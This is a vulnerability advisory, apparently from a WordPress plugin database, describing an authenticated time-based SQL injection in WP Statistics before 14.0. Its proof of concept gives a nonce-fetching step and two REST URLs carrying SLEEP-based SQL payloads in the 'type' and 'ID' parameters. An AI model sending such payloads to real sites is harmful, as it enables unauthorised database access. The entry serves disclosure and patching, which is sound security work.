WordPress Plugin Vulnerabilities
WP Statistics < 14.0 - Authenticated SQLi
Description
The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.
Proof of Concept
Log in as a user allowed to View WP Statistic (by default admins, but this can be changed in Statistic > Settings > Roles) and get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URLs below, which will result in a 6s delay https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=a%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&ID=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-06 (about 1 years ago)
Added
2023-03-06 (about 1 years ago)
Last Updated
2023-03-06 (about 1 years ago)